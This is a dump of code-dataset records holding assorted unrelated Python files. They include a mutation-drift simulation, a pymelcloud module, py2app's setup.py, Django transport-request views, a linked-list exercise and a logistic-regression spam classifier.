StrategieTournerIRL.StrategieTournerIRL(wrapper, 0., 0.)\n stratCarre = StrategiePolygone.StrategiePolygone(startAvancer, startTourner, int(cote))\n\n fps = 60\n\n t2 = threading.Thread(target=updateStrats, args=(stratCarre, fps))\n t2.start()\n\n\nif __name__ == '__main__':\n run(sys.argv[1])\n\n","sub_path":"simu6.py","file_name":"simu6.py","file_ext":"py","file_size_in_byte":1005,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"639400823","text":"from random import choices, choice, uniform, normalvariate\nfrom numpy import mean, log10\n\nBASES = ['A','T','C','G']\n\ndef mutate(seq, r):\n # Replace each base with probability r by a different, randomly chosen base.\n return \"\".join([s if uniform(0,1) > r else choice(list(set(BASES).difference(s))) for s in seq])\n\ndef simi(a, b):\n # Fraction of positions at which both sequences carry the same base.\n return sum([x == y for x,y in zip(a,b)])/len(a)\n\nclass Gene:\n\n def __init__(self, length_gene, mutation_rate, functional_cutoff):\n self.seq = \"\".join(choices(BASES, k=length_gene))\n self.mutation_rate = mutation_rate\n self.functional_cutoff = functional_cutoff\n\n def mutate(self):\n self.seq = mutate(self.seq, self.mutation_rate)\n\n def copy(self):\n out = Gene(len(self.seq), self.mutation_rate, self.functional_cutoff)\n out.seq = self.seq\n return out\n\nclass Model:\n\n def __init__(self, min_mut = None, max_mut = None, functional_cutoff = None, var_functional_cutoff = None):\n self.functional_cutoffs = lambda nb_genes : [normalvariate(functional_cutoff,var_functional_cutoff) for g in range(nb_genes)]\n self.mutation_rates = lambda nb_genes : [10**-uniform(log10(min_mut),log10(max_mut)) for g in range(nb_genes)]\n\n\nclass Genome(object):\n\n def __iter__(self): return iter(self.genome)\n def __getitem__(self, key): return self.genome[key]\n\n def __init__(self, nb_genes, length_genes, model = None):\n self.nb_genes = nb_genes\n self.length_genes = length_genes\n self.model = model\n if self.model:\n self.mutation_rates = self.model.mutation_rates(self.nb_genes)\n self.functional_cutoffs = self.model.functional_cutoffs(self.nb_genes)\n else:\n self.mutation_rates = [0.001]*self.nb_genes\n self.functional_cutoffs = [0.7]*self.nb_genes\n\n # Pass each gene its own rate and cutoff (m, f), not the whole lists.\n self.genome = [Gene(self.length_genes, m, f) for i,m,f in zip(range(self.nb_genes), self.mutation_rates, self.functional_cutoffs)]\n\n def copy(self):\n out_genome = Genome(self.nb_genes,self.length_genes)\n out_genome.genome = [gene.copy() for gene in self.genome]\n return out_genome\n
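\n# Illustrative check of the helpers above (added sketch, not part of the original run):\n# simi(\"AAAA\", \"AAAA\") -> 1.0 (identical sequences)\n# simi(\"AAAA\", \"AATT\") -> 0.5 (half of the positions match)\n# mutate(seq, 0.0) returns seq unchanged; mutate(seq, 1.0) replaces every base.\n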
genome = [gene.seq for gene in Genome(nb_genes=1000, length_genes=100)] # the driver below works on plain sequence strings\n\ncutoffs = [normalvariate(0.5,0.15) for g in genome]\nvar_muts = [10**-uniform(3,6) for g in genome]\nfunc_cutof = mean(cutoffs)\n\nreps = 100000\n\nmut_rate = mean(var_muts)\n\nori_genome = genome\n\noutp =[\"gen\\tseq_id\\tfunct_id\\tmodel\\n\"]\n\nfor i in range(reps):\n print(i)\n genome = [mutate(s,mut) for s,mut in zip(genome,var_muts)]\n simis = [simi(g1,g2) for g1,g2 in zip(ori_genome, genome)]\n seq_id = mean(simis)\n funct_id = str(sum([s > func_cutof for s in simis])/ len(simis))\n if i%10 == 0:\n outp.append(\"{i}\\t{seq}\\t{funct}\\tvarmuts\\n\".format(i=i, seq=seq_id, funct=funct_id) )\n\ngenome = ori_genome\n\nfor i in range(reps):\n print(i)\n genome = [mutate(s,mut_rate) for s in genome]\n simis = [simi(g1,g2) for g1,g2 in zip(ori_genome, genome)]\n seq_id = mean(simis)\n funct_id = str(sum([s > c for s,c in zip(simis,cutoffs)])/ len(simis))\n if i%10 == 0:\n outp.append(\"{i}\\t{seq}\\t{funct}\\tvarcutoff\\n\".format(i=i, seq=seq_id, funct=funct_id) )\n\ngenome = ori_genome\nfor i in range(reps):\n print(i)\n genome = [mutate(s,mut_rate) for s in genome]\n simis = [simi(g1,g2) for g1,g2 in zip(ori_genome, genome)]\n seq_id = mean(simis)\n funct_id = str(sum([s > func_cutof for s in simis])/ len(simis))\n if i%10 == 0:\n outp.append(\"{i}\\t{seq}\\t{funct}\\tdrift\\n\".format(i=i, seq=seq_id, funct=funct_id))\n\ngenome = ori_genome\n\nfor i in range(reps):\n print(i)\n genome = [mutate(s,mut) for s,mut in zip(genome,var_muts)]\n simis = [simi(g1,g2) for g1,g2 in zip(ori_genome, genome)]\n seq_id = mean(simis)\n funct_id = str(sum([s > c for s,c in zip(simis,cutoffs)])/ len(simis))\n if i%10 == 0:\n outp.append(\"{i}\\t{seq}\\t{funct}\\tvarboth\\n\".format(i=i, seq=seq_id, funct=funct_id) )\n\n\n\nwith open(\"out.tsv\",\"w\") as handle:\n handle.writelines(outp)\n","sub_path":"0017_themievo/0017_themievo.py","file_name":"0017_themievo.py","file_ext":"py","file_size_in_byte":4029,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"160418397","text":"import matplotlib.pyplot as plt\nimport xlrd\n\n# make a square figure and axes\n# pie chart looks best in square figures\n# otherwise it looks like ellipses\nplt.figure(1, figsize=(8, 8))\nax = plt.axes([0.1, 0.1, 0.8, 0.8])\n\n# The slices will be ordered and plotted counter-clockwise.\nlabels = 'Babo', 'Chunjae', 'Leesang', 'Honran'\n\n\n# make a pie\n\nplt.title('21st election')\n\n# Inside the for loop: put the data into the Excel file, read it back, and redraw from it?\ndata = []\nfor i in range(100): # repeat 100 times\n wb = xlrd.open_workbook(filename='elec.xlsx')\n ws = wb.sheet_by_name('Sheet1')\n\n data = []\n\n for r in range(ws.nrows):\n col = []\n for c in range(ws.ncols):\n col.append(ws.cell(r, c).value)\n data.append(col)\n\n print(data)\n\n plt.pie(data, labels=labels, autopct='%1.1f%%', startangle=67)\n plt.draw() # draw\n plt.pause(10) # wait for a while\n plt.clf() # clear the figure\n print(\"a\")\n plt.show() # blocking; the next iteration starts after the window is closed\n# It would be good to display the time.. make it change every 10 seconds to show the current status; the graph keeps being updated from the Excel file\n","sub_path":"5-1.py","file_name":"5-1.py","file_ext":"py","file_size_in_byte":1166,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"278353268","text":"\"\"\"MELCloud module\"\"\"\nfrom aiohttp import ClientSession\nimport asyncio\nfrom datetime import timedelta\nfrom typing import Dict, List, Optional\n\nfrom pymelcloud.client import Client as _Client, login as _login\nfrom pymelcloud.device import Device\nfrom pymelcloud.atw_device import AtwDevice\nfrom pymelcloud.ata_device import AtaDevice\n\nDEVICE_TYPE_ATA = \"ata\"\nDEVICE_TYPE_ATW = \"atw\"\n\n\nasync def login(\n email: str,\n password: str,\n session: Optional[ClientSession] = None,\n *,\n conf_update_interval: Optional[timedelta] = None,\n device_set_debounce: Optional[timedelta] = None,\n) -> str:\n \"\"\"\n Log in to MELCloud with given credentials.\n \n Returns access token.\n \"\"\"\n client = await _login(\n email,\n password,\n session,\n # Fall back to the defaults only when the caller did not supply values;\n # previously these keyword arguments were silently ignored.\n conf_update_interval=conf_update_interval or timedelta(minutes=5),\n device_set_debounce=device_set_debounce or timedelta(seconds=1),\n )\n return client.token\n\n\nasync def get_devices(\n token: str,\n session: Optional[ClientSession] = None,\n *,\n conf_update_interval=timedelta(minutes=5),\n device_set_debounce=timedelta(seconds=1),\n) -> Dict[str, List[Device]]:\n \"\"\"Initialize Devices available with the token.\"\"\"\n client = _Client(\n token,\n session,\n conf_update_interval=conf_update_interval,\n device_set_debounce=device_set_debounce,\n )\n await client.update_confs()\n return {\n DEVICE_TYPE_ATA: [\n AtaDevice(conf, client, set_debounce=device_set_debounce)\n for conf in client.device_confs\n if conf.get(\"Device\", {}).get(\"DeviceType\", -1) == 0\n ],\n DEVICE_TYPE_ATW: [\n AtwDevice(conf, client, set_debounce=device_set_debounce)\n for conf in client.device_confs\n if conf.get(\"Device\", {}).get(\"DeviceType\", -1) == 1\n ],\n }\n
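\n# Illustrative usage (added sketch; the credentials and printout are placeholders,\n# not part of the original module):\n#\n# import asyncio\n# import pymelcloud\n#\n# async def main():\n# token = await pymelcloud.login(\"user@example.com\", \"password\")\n# devices = await pymelcloud.get_devices(token)\n# print(devices[pymelcloud.DEVICE_TYPE_ATA])\n#\n# asyncio.run(main())\n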
","sub_path":"pymelcloud/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"188138996","text":"#!/usr/bin/env python\n\ntry:\n import setuptools\nexcept ImportError:\n import distribute_setup\n distribute_setup.use_setuptools()\n\nimport sys, os\nfrom setuptools import setup, find_packages\nfrom distutils.errors import DistutilsError\nfrom distutils import log\nfrom distutils.core import Command\nfrom fnmatch import fnmatch\n\ntry:\n from distutils.core import PyPIRCCommand\nexcept ImportError:\n PyPIRCCommand = None\n\nfp = open('README.txt')\ntry:\n LONG_DESCRIPTION = fp.read()\nfinally:\n fp.close()\n\nfp = open('doc/changelog.rst')\ntry:\n LONG_DESCRIPTION += '\\n' + fp.read()\nfinally:\n fp.close()\n\nCLASSIFIERS = [\n 'Development Status :: 4 - Beta',\n 'Environment :: Console',\n 'Environment :: MacOS X :: Cocoa',\n 'Intended Audience :: Developers',\n 'License :: OSI Approved :: MIT License',\n 'Natural Language :: English',\n 'Operating System :: MacOS :: MacOS X',\n 'Programming Language :: Python',\n 'Programming Language :: Python :: 2',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Objective C',\n 'Topic :: Software Development :: Libraries :: Python Modules',\n 'Topic :: Software Development :: User Interfaces',\n 'Topic :: Software Development :: Build Tools',\n]\n\n\nif sys.version_info[0] == 3 or (sys.version_info[:2] >= (2,7)):\n tests_require = []\nelse:\n tests_require = ['unittest2']\n\n\n\n\n\ndef 
test_loader():\n\n if sys.version_info[0] == 3 or sys.version_info[:2] >= (2, 7):\n import unittest\n else:\n import unittest2 as unittest\n\n topdir = os.path.dirname(os.path.abspath(__file__))\n testModules = [ fn[:-3] for fn in os.listdir(os.path.join(topdir, 'py2app_tests')) if fn.endswith('.py')]\n sys.path.insert(0, os.path.join(topdir, 'py2app_tests'))\n\n suites = []\n for modName in testModules:\n try:\n module = __import__(modName)\n except ImportError:\n print (\"SKIP %s: %s\"%(modName, sys.exc_info()[1]))\n continue\n\n s = unittest.defaultTestLoader.loadTestsFromModule(module)\n suites.append(s)\n\n return unittest.TestSuite(suites)\n\nif PyPIRCCommand is None:\n class upload_docs (Command):\n description = \"upload sphinx documentation\"\n user_options = []\n\n def initialize_options(self):\n pass\n\n def finalize_options(self):\n pass\n\n def run(self):\n raise DistutilsError(\"not supported on this version of python\")\n\nelse:\n class upload_docs (PyPIRCCommand):\n description = \"upload sphinx documentation\"\n user_options = PyPIRCCommand.user_options\n\n def initialize_options(self):\n PyPIRCCommand.initialize_options(self)\n self.username = ''\n self.password = ''\n\n\n def finalize_options(self):\n PyPIRCCommand.finalize_options(self)\n config = self._read_pypirc()\n if config != {}:\n self.username = config['username']\n self.password = config['password']\n\n\n def run(self):\n import subprocess\n import shutil\n import zipfile\n import os\n import urllib\n import StringIO\n from base64 import standard_b64encode\n import httplib\n import urlparse\n\n # Extract the package name from distutils metadata\n meta = self.distribution.metadata\n name = meta.get_name()\n\n # Run sphinx\n if os.path.exists('doc/_build'):\n shutil.rmtree('doc/_build')\n os.mkdir('doc/_build')\n\n p = subprocess.Popen(['make', 'html'],\n cwd='doc')\n exit = p.wait()\n if exit != 0:\n raise DistutilsError(\"sphinx-build failed\")\n\n # Collect sphinx output\n if not os.path.exists('dist'):\n os.mkdir('dist')\n zf = zipfile.ZipFile('dist/%s-docs.zip'%(name,), 'w', \n compression=zipfile.ZIP_DEFLATED)\n\n for toplevel, dirs, files in os.walk('doc/_build/html'):\n for fn in files:\n fullname = os.path.join(toplevel, fn)\n relname = os.path.relpath(fullname, 'doc/_build/html')\n\n print (\"%s -> %s\"%(fullname, relname))\n\n zf.write(fullname, relname)\n\n zf.close()\n\n # Upload the results, this code is based on the distutils\n # 'upload' command.\n content = open('dist/%s-docs.zip'%(name,), 'rb').read()\n \n data = {\n ':action': 'doc_upload',\n 'name': name,\n 'content': ('%s-docs.zip'%(name,), content),\n }\n auth = \"Basic \" + standard_b64encode(self.username + \":\" +\n self.password)\n\n\n boundary = '--------------GHSKFJDLGDS7543FJKLFHRE75642756743254'\n sep_boundary = '\\n--' + boundary\n end_boundary = sep_boundary + '--'\n body = StringIO.StringIO()\n for key, value in data.items():\n if not isinstance(value, list):\n value = [value]\n\n for value in value:\n if isinstance(value, tuple):\n fn = ';filename=\"%s\"'%(value[0])\n value = value[1]\n else:\n fn = ''\n\n body.write(sep_boundary)\n body.write('\\nContent-Disposition: form-data; name=\"%s\"'%key)\n body.write(fn)\n body.write(\"\\n\\n\")\n body.write(value)\n\n body.write(end_boundary)\n body.write('\\n')\n body = body.getvalue()\n\n self.announce(\"Uploading documentation to %s\"%(self.repository,), log.INFO)\n\n schema, netloc, url, params, query, fragments = \\\n urlparse.urlparse(self.repository)\n\n\n if schema == 'http':\n 
http = httplib.HTTPConnection(netloc)\n elif schema == 'https':\n http = httplib.HTTPSConnection(netloc)\n else:\n raise AssertionError(\"unsupported schema \"+schema)\n\n data = ''\n loglevel = log.INFO\n try:\n http.connect()\n http.putrequest(\"POST\", url)\n http.putheader('Content-type',\n 'multipart/form-data; boundary=%s'%boundary)\n http.putheader('Content-length', str(len(body)))\n http.putheader('Authorization', auth)\n http.endheaders()\n http.send(body)\n except socket.error:\n e = socket.exc_info()[1]\n self.announce(str(e), log.ERROR)\n return\n\n r = http.getresponse()\n if r.status in (200, 301):\n self.announce('Upload succeeded (%s): %s' % (r.status, r.reason),\n log.INFO)\n else:\n self.announce('Upload failed (%s): %s' % (r.status, r.reason),\n log.ERROR)\n\n print ('-'*75) \n print (r.read())\n print ('-'*75)\n\n\ndef recursiveGlob(root, pathPattern):\n \"\"\"\n Recursively look for files matching 'pathPattern'. Return a list\n of matching files/directories.\n \"\"\"\n result = []\n\n for rootpath, dirnames, filenames in os.walk(root):\n for fn in filenames:\n if fnmatch(fn, pathPattern):\n result.append(os.path.join(rootpath, fn))\n return result\n \n\ndef importExternalTestCases(unittest, \n pathPattern=\"test_*.py\", root=\".\", package=None):\n \"\"\"\n Import all unittests in the PyObjC tree starting at 'root'\n \"\"\"\n\n testFiles = recursiveGlob(root, pathPattern)\n testModules = map(lambda x:x[len(root)+1:-3].replace('/', '.'), testFiles)\n if package is not None:\n testModules = [(package + '.' + m) for m in testModules]\n\n suites = []\n \n for modName in testModules:\n try:\n module = __import__(modName)\n except ImportError:\n print(\"SKIP %s: %s\"%(modName, sys.exc_info()[1]))\n continue\n\n if '.' in modName:\n for elem in modName.split('.')[1:]:\n module = getattr(module, elem)\n\n s = unittest.defaultTestLoader.loadTestsFromModule(module)\n suites.append(s)\n\n return unittest.TestSuite(suites)\n\n\nclass test (Command):\n description = \"run test suite\"\n user_options = [\n ('verbosity=', None, \"print what tests are run\"),\n ]\n\n def initialize_options(self):\n self.verbosity='1'\n\n def finalize_options(self):\n if isinstance(self.verbosity, str):\n self.verbosity = int(self.verbosity)\n\n\n def cleanup_environment(self):\n ei_cmd = self.get_finalized_command('egg_info')\n egg_name = ei_cmd.egg_name.replace('-', '_')\n\n to_remove = []\n for dirname in sys.path:\n bn = os.path.basename(dirname)\n if bn.startswith(egg_name + \"-\"):\n to_remove.append(dirname)\n\n for dirname in to_remove:\n log.info(\"removing installed %r from sys.path before testing\"%(\n dirname,))\n sys.path.remove(dirname)\n\n def add_project_to_sys_path(self):\n from pkg_resources import normalize_path, add_activation_listener\n from pkg_resources import working_set, require\n\n self.reinitialize_command('egg_info')\n self.run_command('egg_info')\n self.reinitialize_command('build_ext', inplace=1)\n self.run_command('build_ext')\n\n\n # Check if this distribution is already on sys.path\n # and remove that version, this ensures that the right\n # copy of the package gets tested.\n\n self.__old_path = sys.path[:]\n self.__old_modules = sys.modules.copy()\n\n\n ei_cmd = self.get_finalized_command('egg_info')\n sys.path.insert(0, normalize_path(ei_cmd.egg_base))\n sys.path.insert(1, os.path.dirname(__file__))\n\n # Strip the namespace packages defined in this distribution\n # from sys.modules, needed to reset the search path for\n # those modules.\n\n nspkgs = 
getattr(self.distribution, 'namespace_packages')\n if nspkgs is not None:\n for nm in nspkgs:\n del sys.modules[nm]\n \n # Reset pkg_resources state:\n add_activation_listener(lambda dist: dist.activate())\n working_set.__init__()\n require('%s==%s'%(ei_cmd.egg_name, ei_cmd.egg_version))\n\n def remove_from_sys_path(self):\n from pkg_resources import working_set\n sys.path[:] = self.__old_path\n sys.modules.clear()\n sys.modules.update(self.__old_modules)\n working_set.__init__()\n\n\n def run(self):\n if sys.version_info[:2] <= (2,6):\n import unittest2 as unittest\n else:\n import unittest\n\n # Ensure that build directory is on sys.path (py3k)\n\n self.cleanup_environment()\n self.add_project_to_sys_path()\n\n try:\n meta = self.distribution.metadata\n name = meta.get_name()\n test_pkg = name + \"_tests\"\n suite = importExternalTestCases(unittest, \n \"test_*.py\", test_pkg, test_pkg)\n\n runner = unittest.TextTestRunner(verbosity=self.verbosity)\n result = runner.run(suite)\n\n # Print out summary. This is a structured format that\n # should make it easy to use this information in scripts.\n summary = dict(\n count=result.testsRun,\n fails=len(result.failures),\n errors=len(result.errors),\n xfails=len(getattr(result, 'expectedFailures', [])),\n xpass=len(getattr(result, 'expectedSuccesses', [])),\n skip=len(getattr(result, 'skipped', [])),\n )\n print(\"SUMMARY: %s\"%(summary,))\n\n finally:\n self.remove_from_sys_path()\nsetup(\n # metadata\n name='py2app',\n version='0.7.3',\n description='Create standalone Mac OS X applications with Python',\n #author='Bob Ippolito',\n #author_email='bob@redivi.com',\n maintainer='Ronald Oussoren',\n maintainer_email=\"ronaldoussoren@mac.com\",\n url='http://bitbucket.org/ronaldoussoren/py2app',\n download_url='http://pypi.python.org/pypi/py2app',\n license='MIT or PSF License',\n platforms=['MacOS X'],\n long_description=LONG_DESCRIPTION,\n classifiers=CLASSIFIERS,\n install_requires=[\n \"altgraph>=0.10.1\",\n \"modulegraph>=0.10.3\",\n \"macholib>=1.5\",\n ],\n tests_require=tests_require,\n cmdclass=dict(\n upload_docs=upload_docs,\n test=test,\n ),\n packages=find_packages(exclude=['py2app_tests']),\n package_data={\n 'py2app.recipes': [\n 'qt.conf',\n ],\n 'py2app.apptemplate': [\n 'prebuilt/main-i386',\n 'prebuilt/main-ppc',\n 'prebuilt/main-x86_64',\n 'prebuilt/main-ppc64',\n 'prebuilt/main-fat',\n 'prebuilt/main-fat3',\n 'prebuilt/main-intel',\n 'prebuilt/main-universal',\n 'lib/__error__.sh',\n 'lib/site.py',\n 'src/main.c',\n ],\n 'py2app.bundletemplate': [\n 'prebuilt/main-i386',\n 'prebuilt/main-ppc',\n 'prebuilt/main-x86_64',\n 'prebuilt/main-ppc64',\n 'prebuilt/main-fat',\n 'prebuilt/main-fat3',\n 'prebuilt/main-intel',\n 'prebuilt/main-universal',\n 'lib/__error__.sh',\n 'lib/site.py',\n 'src/main.m',\n ],\n },\n entry_points={\n 'distutils.commands': [\n \"py2app = py2app.build_app:py2app\",\n ],\n 'distutils.setup_keywords': [\n \"app = py2app.build_app:validate_target\",\n \"plugin = py2app.build_app:validate_target\",\n ],\n 'console_scripts': [\n \"py2applet = py2app.script_py2applet:main\",\n ],\n 'py2app.converter': [\n \"xib = py2app.converters.nibfile:convert_xib\",\n \"datamodel = py2app.converters.coredata:convert_datamodel\",\n \"mappingmodel = py2app.converters.coredata:convert_mappingmodel\",\n ],\n 'py2app.recipe': [\n ]\n },\n\n # py2app/build_app.py uses imp.find_module, and that won't work\n # with a zipped egg.\n #zip_safe=False,\n dependency_links=[], # workaround for setuptools 0.6b4 
bug\n)\n","sub_path":"Modules/py2app-0.7.3/py2app-0.7.3-noprebuilt/setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":14732,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"288694848","text":"import random\nimport requests\nimport time\n\nfrom bs4 import BeautifulSoup\n\nfrom mentalist.settings import load_config, MAIN_CONFIG_FILE\nfrom mentalist.monitoring import setup_logger\n\nlogger = setup_logger(__name__)\n\n\ndef linear_retry(func):\n \"\"\"Linearly retry for the download and unzip processes.\"\"\"\n def wrapper(*args, **kwargs):\n retries = 1\n while retries <= 3:\n result = func(*args, **kwargs)\n if not result:\n time.sleep(retries)\n retries += 1\n else:\n break\n if retries > 3:\n logger.error(\"Tried more than 3 times to %s\", func.__name__)\n return False\n return result\n\n return wrapper\n\n\ndef random_sleep(start=3, finish=6):\n \"\"\"Be a gentleman.\"\"\"\n time.sleep(random.randint(start, finish))\n\n\nclass URLHandler:\n def __init__(self):\n self.HEADERS = load_config(MAIN_CONFIG_FILE, 'headers')\n\n def open_url(self, url):\n try:\n with requests.Session() as sess:\n resp = sess.get(url, headers=self.HEADERS)\n except Exception:\n return False\n else:\n if resp.ok:\n return resp\n else:\n return False\n\n def get_bs_obj(self, url):\n response = self.open_url(url)\n try:\n return BeautifulSoup(response.text)\n except Exception:\n return False","sub_path":"mentalist/utilities.py","file_name":"utilities.py","file_ext":"py","file_size_in_byte":1435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"} +{"seq_id":"279650667","text":"from django.contrib.auth.mixins import LoginRequiredMixin\nfrom django.shortcuts import render, redirect\nfrom django.urls import reverse_lazy\nfrom django.views.generic import FormView, DeleteView, UpdateView, DetailView\n\nfrom exam_project.app.forms.transport_offer_form import TransportOfferForm\nfrom exam_project.app.forms.transport_request_form import TransportRequestForm\nfrom exam_project.app.models import TransportRequest, TransportOffer, Warehouse\n\n\nclass TransportRequestCreateView(LoginRequiredMixin, FormView):\n form_class = TransportRequestForm\n\n def form_valid(self, form):\n request = form.save(commit=False)\n request.user = self.request.user\n request.warehouse = Warehouse.objects.get(pk=self.kwargs['pk'])\n request.save()\n return redirect('warehouse details', self.kwargs['pk'])\n\n\nclass TransportRequestDeleteView(LoginRequiredMixin, DeleteView):\n fields = '__all__'\n model = TransportRequest\n template_name = 'request_delete.html'\n context_object_name = 'request'\n\n def get_success_url(self):\n request_to_delete_id = self.kwargs['pk']\n warehouse_id = TransportRequest.objects.get(pk=request_to_delete_id).warehouse.id\n return reverse_lazy('warehouse details', kwargs={'pk': warehouse_id})\n\n\nclass TransportRequestUpdateView(LoginRequiredMixin, UpdateView):\n form_class = TransportRequestForm\n model = TransportRequest\n context_object_name = 'request'\n template_name = 'request_update.html'\n\n def get_success_url(self):\n url = reverse_lazy('request details', kwargs={'pk': self.object.id})\n return url\n\n def form_valid(self, form):\n form.save()\n return super().form_valid(form)\n\n\nclass TransportRequestDetailsView(LoginRequiredMixin, DetailView):\n model = TransportRequest\n template_name = 'request_details.html'\n context_object_name = 'current_request'\n\n def get_context_data(self, **kwargs):\n 
context = super().get_context_data(**kwargs)\n request = self.get_object()\n # admin = self.request.user.id == 1\n context['form'] = TransportOfferForm\n context['created_by'] = request.user\n context['offer_list'] = request.transportoffer_set.all()\n context['can_edit'] = self.request.user == request.user\n context['can_delete'] = self.request.user == request.user\n context['can_quote'] = self.request.user.userprofile.department == \"Pricing\"\n\n return context\n","sub_path":"exam_project/app/views/transport_request_views.py","file_name":"transport_request_views.py","file_ext":"py","file_size_in_byte":2469,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"563776935","text":"# Node class \nclass Node: \n \n # Function to initialise the node object \n def __init__(self, data):\n self.data = data\n self.next = None\n \nclass LinkedList: \n \n def __init__(self): \n # Initialize head with a sentinel node\n self.head = Node('dummy')\n \n\n def push(self, new_data): \n new_node = Node(new_data)\n temp = self.head\n while temp.next:\n temp = temp.next\n temp.next = new_node\n return self.head\n \n # Function to get the middle of \n # the linked list \n def printMiddle(self): \n head = self.head\n # Both pointers start at the sentinel, so slow ends on the middle real node.\n slow = head\n fast = head\n while fast and fast.next:\n slow = slow.next\n fast = fast.next.next\n print(slow.data) \n\n# Driver code \nlist1 = LinkedList() \nlist1.push(5) \nlist1.push(4) \nlist1.push(2) \nlist1.push(3) \nlist1.push(1) \nlist1.printMiddle() \n\n# Time Complexity - O(n)\n# Space Complexity - O(1)","sub_path":"Exercise_3.py","file_name":"Exercise_3.py","file_ext":"py","file_size_in_byte":976,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"13"}
+{"seq_id":"352822658","text":"import operator\nimport numpy as np\nimport sklearn.metrics\nfrom matplotlib import pyplot\nfrom sklearn.preprocessing import scale\nfrom sklearn.model_selection import train_test_split\n\nfrom sklearn.metrics import roc_curve, auc\nfrom scipy import interp\nfrom sklearn.metrics import roc_auc_score\n\n# function: calc_gradient\n# calculates the gradient for a specific weightVector\n# returns: the mean of the gradients as a vector\ndef calc_gradient(weightVector, y_tild, X) :\n size = y_tild.shape[0]\n\n total = 0 # avoid shadowing the builtin sum()\n for index in range(size) :\n # w.x must be a scalar inner product, not an elementwise product\n total += (-y_tild[index] * X[index]) / (1 + np.exp(y_tild[index] * np.dot(weightVector, X[index])))\n mean = total / size\n\n #m = X.shape[0]\n #gradient = (1 / m) * np.dot(X.T, (1 / (1 + np.exp(-(np.dot(X, weightVector))))) - y)\n\n return mean\n\n# function: gradient_descent\n# calculates the gradient descent for a given X matrix with corresponding y vector\ndef gradient_descent( X, y, stepSize, maxIterations) :\n\n # declare weightVector which is initialized to the zero vector\n # one element for each feature\n dimension = X.shape\n features = dimension[1]\n weightVector = np.zeros(features)\n\n # declare weightMatrix of real number\n # number of rows = features, number of cols = maxIterations\n num_of_entries = features * maxIterations\n weightMatrix = np.array(np.zeros(num_of_entries).reshape(features, maxIterations))\n\n size = y.shape[0]\n y_tild = np.empty(size)\n for index in range(size):\n if (y[index] == 0): y_tild[index] = -1\n else : y_tild[index] = 1\n\n for index in range(maxIterations) :\n # first compute the gradient given the current weightVector\n # make sure that the gradient is of the mean logistic loss over all training data\n #print(weightVector)\n gradient = 
calc_gradient(weightVector, y_tild, X)\n\n # then update weightVector by taking a step in the negative gradient direction\n weightVector = weightVector - stepSize * gradient\n\n # then store the resulting weightVector in the corresponding column of weightMatrix\n for row in range(features) :\n weightMatrix[row][index] = weightVector[row]\n\n return weightMatrix\n\n# function sigmoid\ndef sigmoid(x) :\n x = 1 / (1 + np.exp(-x))\n return x\n\n# read data from csv\nall_data = np.genfromtxt('spam.data', delimiter=\" \")\n# get size of data\nsize = all_data.shape[1] - 1\n# set inputs to everything but last col, and scale\nX = scale(np.delete(all_data, size, axis=1))\n# set outputs to last col of data\ny = all_data[:, size]\n\n# Create train, test, and validation sets\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=1)\nX_train, X_val, y_train, y_val = train_test_split(X_train, y_train, test_size=0.25, random_state=1)\n\n# print sizes of each set\nprint(\"{: >11} {: >4} {: >4}\".format(\"\", \"y\", \"\"))\nprint(\"{: >11} {: >4} {: >4}\".format(\"set\", 0, 1))\nprint(\"{: >11} {: >4} {: >4}\".format(\"train\", np.sum(y_train==0), np.sum(y_train==1)))\nprint(\"{: >11} {: >4} {: >4}\".format(\"test\", np.sum(y_test==0), np.sum(y_test==1)))\nprint(\"{: >11} {: >4} {: >4}\".format(\"validation\", np.sum(y_val==0), np.sum(y_val==1)))\n\n# get weightMatrix\nmaxIterations = 400\nweightMatrix = gradient_descent(X_train, y_train, 0.1, maxIterations)\n\n# vectorize sigmoid function to pass on prediction matrix\nsig_v = np.vectorize(sigmoid)\n\n# calculate predicted matrix, round each answer\ntrain_pred = np.dot( X_train, weightMatrix)\nval_pred = np.dot( X_val, weightMatrix)\ntest_pred = np.dot( X_test, weightMatrix)\n\n# pass sigmoid function onto prediction and round\ntrain_pred = np.around(sig_v(train_pred))\nval_pred = np.around(sig_v(val_pred))\ntest_pred = np.around(sig_v(test_pred))\n\n# calculate percent error\ntrain_result = []\nval_result = []\nfor index in range(maxIterations) :\n train_result.append( np.mean( y_train != train_pred[:,index]))\nfor index in range(maxIterations):\n val_result.append(np.mean( y_val != val_pred[:, index]))\ntrain_min_index, train_min_value = min(enumerate(train_result), key=operator.itemgetter(1))\nval_min_index, val_min_value = min(enumerate(val_result), key=operator.itemgetter(1))\n\nprint(train_result)\nprint(val_result)\n\n# graph percent error\nfig = pyplot.figure()\nax = fig.add_subplot(111)\nline1, = ax.plot(train_result, \"g-\", label='train')\nax.annotate('train min', xy=(train_min_index, train_min_value), xytext=(train_min_index, train_min_value),\n arrowprops=dict(facecolor='green', shrink=0.05),)\nline2, = ax.plot(val_result, \"r-\", label='validation')\nax.annotate('validation min', xy=(val_min_index, val_min_value), xytext=(val_min_index, val_min_value),\n arrowprops=dict(facecolor='red', shrink=0.05),)\nax.set_ylabel(\"Percent\")\nax.set_xlabel(\"Iterations\")\nax.set_title(\"Percent Error\")\n#ax.set_ylim(0,.8)\nax.legend()\npyplot.show()\n\n# calculate logistic loss\ntrain_loss_results = []\nfor index in range(maxIterations) :\n train_loss_results.append( sklearn.metrics.log_loss( y_train, train_pred[:,index]) )\nval_loss_results = []\nfor index in range(maxIterations):\n val_loss_results.append(sklearn.metrics.log_loss( y_val, val_pred[:, index]))\ntrain_min_index, train_min_value = min(enumerate(train_loss_results), key=operator.itemgetter(1))\nval_min_index, val_min_value = min(enumerate(val_loss_results), 
